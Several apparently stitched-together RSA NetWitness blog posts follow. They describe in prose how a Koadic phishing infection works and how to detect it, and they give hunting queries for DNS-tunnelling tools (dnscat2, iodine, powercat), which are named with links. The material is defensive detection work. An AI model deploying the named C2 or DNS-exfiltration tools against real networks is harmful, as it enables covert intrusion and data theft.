The attacker sets up their Koadic listener and builds a malicious email to send to their victim. The attacker wants the victim to run their malicious code, and in order to do this, they tried to make the email look more legitimate by supplying a Dropbox link, and a password for the file:

 

The user downloads the ZIP, decompresses using the password in the email, and is presented with a Javascript file that has a .doc extension. Here the attacker is relying on the victim not being well versed with computers, and not noticing the obvious problems with this file (extension, icon, etc.):

 

 

 

Fortunately for the attacker, the victim double clicks the file to open it and they get a call back to their C2:

 

From here, the attacker can start to execute commands:

 

 

The Detection in NetWitness Packets

The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. From here, the analyst the can start to pull apart the protocol and look for anomalies within its behaviour; the analyst opens the Service Analysis meta key to do this and observed two pieces of metadata of interest:

 

  • http post missing content-type

  • http post no get

 

 

 

These two queries have now reduced the data set for the analyst from 2,538 sessions to 67:

 

NOTE: This is not to say that the other sessions do not have malicious traffic, nor that the analyst will ignore them, but just at this point in time this is the analysts focal point. If this traffic after analysis turned out to be clean, they could exclude it from their search and pick apart other anomalous HTTP traffic in the same manner as before. This allows the analyst to go though the data in a more comprehensive and approachable manner.

 

Now that the data set has been reduced, the analyst can start open other meta keys to see understand the context of the traffic. The analyst wants to see if any files are being transferred, and to see what user agents are involved, to do so, they open the Extension, Filename, and Client Application meta key. Here they observe an extension they do not typically see during their daily hunting, WSF. They see what appears to be a random filename, and a user agent they are not overly familiar with:

 

There are only eight sessions for this traffic, so the analyst is now at a point where they could start to reconstruct the raw sessions and see what if they can better understand what this traffic is for. Opening the Event Analysis view, the analyst first looks to see if they can observe any pattern in the connection times, and to look at how much the payload varies in size:

NOTE: Low variation in payload size and connections that take place every x minutes is indicative of automated behaviour. Whether that behaviour is malicious or not is up to the analyst to decipher, this could be a simple weather update for example, but this sort of automated traffic is exactly what the analyst should be looking for when it comes to C2 communication; weeding out the user generated traffic to get to the automated communications.

 

Reconstructing the sessions, the analyst stumbles across a session that contains a tasklist output. This immediately stands out as suspicious to the analyst:

 

From here, the analyst can build a query to focus on this communication between these two hosts and find out when this activity started happening:

 

Looking into the first sessions of this activity, the analyst can see a GET request for the oddly named WSF file, and that BITS was used to download it:

 

The response for this file contains the malicious javascript that infected the endpoint:

 

Further perusing the sessions, it is also possible to see the commands being executed by the attacker:

 

The analyst is now extremely confident this is malicious traffic and needs to be able to track it. The best way to do this is with an application rule. The analyst looks through the traffic and decides upon the following two pieces of logic to detect this behaviour:

 

To detect the initial infection:

extension = 'wsf' && client contains 'bits'

To detect the beacons:

extension = 'wsf' && query contains 'csrf='

 

NOTE: The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

The Detection in NetWitness Endpoint

Every day the analyst should review the IOC, BOC, and EOC meta keys; paying particular attention to the high-risk indicators first. Here the analyst can see a high-risk meta value, transfers file using bits:

 

Here the analyst can see cmd.exe spawning bitsadmin.exe and downloading a suspiciously named file into the \AppData\Local\Temp\ directory. This stands out as suspicious to the analyst:

 

From here, the analyst places an analytical lens on this specific host and begins to look through what other actions took place around the same time. The analyst observes commands being executed against this endpoint and now knows it is infected:

 

Conclusion

Understanding the nuances between user based behavior and mechanical behavior gives an advantage to the analyst who is performing threat hunting. If the analyst understands what "normal" should look like within their environment, they can easily discern it from abnormal behaviors.

 

Analysts should also be aware that not all attackers will use proprietary tools, or even alter the readily available ones to evade detection. An attacker only needs to make one mistake and you can unravel their whole their operation. So don't always ignore the low hanging fruit.

There is a new space available on RSA Link: Troubleshooting the RSA NetWitness® Platform

The purpose of this space is to consolidate the available troubleshooting information for RSA NetWitness into a single space.

Information is separated into several "widgets" that are used to categorize the types of troubleshooting items:

  • Installation information
  • Knowledge base articles that contain troubleshooting information
  • Blog posts that discuss troubleshooting the RSA NetWitness platform
  • Videos and tutorials
  • Troubleshooting topics from the user guides

The goal of this space is to be the place you can come to find a wide variety of troubleshooting information in one place. While the information is also available elsewhere in RSA Link, it may be mixed in with other types of information. In this space, all the information you see is targeted toward helping you solve problems that you encounter while using RSA NetWitness.

Quite frequently when testing ESA alerts and output options / templates, I have wanted the ability to manually or repeatedly trigger alerts.  In order to help with this type of testing, I created a couple ESA Alert templates to generate both scheduled alerting and manual, one-time alerts.

 

Each of these can take a wide variety of time- or schedule-based inputs to generate alerts according to whatever kind of frequency you might want.  The descriptions in each alert have examples, requirements, and links to official Esper documentation with more detail.

 

I see the potential for quite a bit of usefulness with the Crontab alert, especially in 11.3 now that ESA Alert script outputs run from the admin server.

 

Lastly, I created these using freemarker templates (how the ESA Rules from Live are packaged) in order to ensure that the times and schedules used in the alerts adhere to proper syntax and formatting, but of course you should feel free to convert these to advanced rules if you like.

 

 

Introduction

There are many, many ways to exfiltrate data from a network, but one common way to do it is using DNS Exfiltration.

With these specific techniques the attackers use the already open port for dns traffic as the door for uploading and downloading data between the attacked host and his own external server.

 

Obviously with the normal daemon for DNS resolution that’s not possible, but with the right software and the right configuration it is possible to use any DNS server and set it up within any infrastructure to exfiltrate data without the right permissions needed.

 

But how is possible?

 

There are many packages already built which are ready to be used for this purpose and the most common are: Dnscat2, Iodine and Powercat+Dnscat2.

 

Just a quick tip, don’t imagine an attacker using a specific version built only for you.  Attackers are lazy and they need to be sure their attack is efficient, so most of the time you will end up fighting with one of these three DNS exfiltration tools.  They'll either be renamed or exactly the same as you can find on GitHub.

 

Remember to also check the second level domain to avoid any confusion with legitimate software using dns tunneling.

 

So, let’s take a look into these three tools, both work for the same purpose and same TCP/UDP port but with some difference in how to send the data outside the network:

 

Dnscat2 (https://github.com/iagox86/dnscat2): it connects to a server component to try to resolve TXT queries and all data going up and down, to and from, the external server in an encrypted way or not, depending on your choice. This tool is widely used, also because it is ported into multiple programming languages, like Ruby, Perl, PowerShell, etc. This way it can be easier to implement and it'll essentially work on any network.

 

Iodine (https://code.kryo.se/iodine/): same basic functionality as previous one, make tunnel through DNS, but with little difference like password for accessing the tunnel, and uses the NULL type that allows the downstream data to be sent without encoding. Each DNS reply can contain over a kilobyte of compressed payload data; there’s also the android version, so all the work is almost done for example to implement it also on IoT device running Android.

 

Powercat (https://github.com/besimorhino/powercat): that tool alone don’t work as a dnstunnel, but if the server part is dnscat2, you can have a interactive Powershell over legitimate dns traffic, and you can increase your capability by adding other Powershell attack framework like Nishang, Powershell Empire, etc..

 

The purpose of these article is not “how to exfiltrate data from a network”, but let’s take a look how our products can help you to identify and track any usage of these technique in your network, and for that I’ve choose the common approach used every day by me and my colleagues of Incident Response Services.

 

For that I’ve choosen RSA NetWitness Network. Let’s take a look at the essential steps.


 

Preparation

In your NetWitness Network click on configure, select as Resource Type Bundle, click Search, choose Hunting Pack and click on Deploy to deploy the hunting pack as showed in Figure 1 to the appropriate component of your infrastructure.

Figure 1

 

Now choose Lua Parser as Resource Type, click Search and choose nwll and DNS_verbose_lua as parser and click on Deploy to deploy the parser as showed in Figure 2.

Figure 2

 

Now that your NetWitness Packets (network) environment is ready and have all you need to parse and identify in the right way DNS traffic you can start with your analysis.

 

Now let’s see how to find bad DNS traffic, or better, the traffic who cross DNS port but is not a real DNS traffic.

 

 

Dnscat2 traffic

With right package and parser deployed, if there’s traffic generated by Dnscat2 into your network, many indicators rise to your eyes and help you to fast identify it.

Figure 3

 

As showed in Figure 3, for Service Type = DNS (service = 53) Service Analysis show presence of “dns base36 TXT record” and “hostname consecutive consonants” plus “dns large answer” as Risk Information and “Hostname Aliases” like the hostname showed in Figure 3 are good sign Dnscat2 traffic presence.

Scrolling to the others meta keys as showed in Figure 4 you find DNS Query Type with value “txt record” and DNS response text with values of many chars without apparent sense, now you have sufficient alerts!

 

 

Figure 4

 

So, in my network there are query for txt record, with base36 encoding, large answer, apparently random text response and random chars host alias? To be sure that’s not a normal DNS traffic you can click on one of these events and see what inside as showed in Figure 5……

 

Figure 5

 

Now you have clear that you are in front of Dnscat2 traffic and you have to do further analysis on Source Ipaddress who generate this traffic.

 

A quick query i apply every day to find its presence in the preferred time span, can be: service = 53 && dns.querytype = 'txt record' && analysis.service = 'hostname consecutive consonants' && analysis.service = 'dns base36 txt record'


 

Iodine traffic 

Let’s check some interesting meta who give me the ability to find Iodine traffic.

 

Figure 6

 

As showed in Figure 6 there’s Service analysis with “hostname invalid” and “hostname consecutive consonants”, Risk Suspicious with “dns extremely low ttl”, Host aliases with a lot of “strange” hostname, but check if there’s something more…

 

 

Figure 7

 

As showed in Figure 7 there’s also another interesting filed, DNS query type who say “experimental null record”, so job done, all of these meta are related to Iodine activity and the packet showed in Figure 8 confirm the traffic.

 

Figure 8

 

Now you have clear that you are in front of Iodine traffic and you have to do further analysis on Source Ipaddress who generate this traffic.

 

A quick query i apply every day to find its presence in the preferred time span, can be: service = 53 && dns.querytype = 'experimental null record'

 


 

Powercat + Dnscat2

Looking into Powercat + Dnscat2 is different from previous one, let’s check why.

As showed in Figure 9 Session analysis say “single sided udp” , Service Analysis say “hostname consecutive consonants”, dns base 36 txt records”, “dns single request response” and Hostname aliases have a lot of hostname with strange names.

 

Figure 9

 

Looking on more meta as shown in Figure 10, there’s DNS query type as “txt record” and DNS Response text with a lot of strange text starting with same char.

 

 

Figure 10

 

Look similar to Dnscat2 traffic but not exactly the same there’s a specific difference between standard dnscat2 traffic and be the “single side udp” and “dns single side request response”.

 

Figure 11

 

As showed in Figure 11 there’s only one request and one response, and that’s the main difference from standard dnscat2 and Powercat with Dnscat2.

Now you have clear that you are in front of Powercat with Dnscat2 traffic and you have to do further analysis on Source Ipaddress who generate this traffic.

 

A quick query i apply every day to find its presence in the preferred time span, can be: service = 53 && analysis.service = 'hostname consecutive consonants' && analysis.service = 'dns base36 txt record' && analysis.service = 'dns single request response'


 

Addon

Most of the time, when you look into DNS traffic, maybe you encounter something like a client who work not only with UDP but also with TCP protocol.

If the information about the source is right, with these hunting methodology you can archive also some goal about network misconfiguration.

That’s because DNS infrastructure need to be managed and there are a lot of guide on "How to secure your DNS infrastructure", so in a normal situation a client try dns resolution through one internal server, most of the time a domain controller, who talk with a DNS forwarder allowed to go outside of the network for resolution ( if both have nothing into cache).

So if you see a client go to ask resolution from client network to internet , also with TCP protocol, is better if you check more your DNS infrastructure, because one backdoor on client machine using port 53, probably have direct access to internet and you can exfiltrate everything without usage of any dnstunnel, but only using the port allowed.

 

A quick query i apply every day to find its presence in the preferred time span, can be: direction = 'outbound' && service = 53 && ip.proto = 6 and if your source ipaddress are filled with a lot of ip coming from client network, you have some possible misconfiguration into the network and/or some possible hole.


 

Finally

There are many ways to hunt and dig into a system, but with the right product and the right methodology you can archive success very faster and this article want be a quick help on doing that because every day we do that with our products!

 

Hope this helps.

 

Thank you.

 

Max

 

 

Filter Blog

By date: By tag: